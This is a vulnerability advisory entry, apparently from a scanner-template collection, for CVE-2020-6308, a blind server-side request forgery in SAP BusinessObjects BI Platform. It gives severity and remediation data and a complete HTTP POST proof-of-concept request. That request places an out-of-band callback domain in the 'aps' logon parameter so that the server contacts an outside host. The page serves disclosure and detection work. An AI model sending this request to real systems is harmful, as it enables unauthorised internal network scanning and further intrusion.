| Title | SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery |
|---|---|
| Author | madrobot |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks. |
| Remediation | Apply the relevant security patches provided by SAP to mitigate this vulnerability. |
| CVSS Score | 5.3 |
| EPSS Score | 0.82056 |
| CVE ID | CVE-2020-6308 |
| CWE ID | CWE-918 |
| Tags | cve2020 cve sap ssrf oast unauth vkev vuln |
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
POST /AdminTools/querybuilder/logon?framework HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
aps=d5jp1hple0o3cn7c0k40wx8jkidos11jz.oast.fun&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-6308.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-6308.pcap
N/AN/A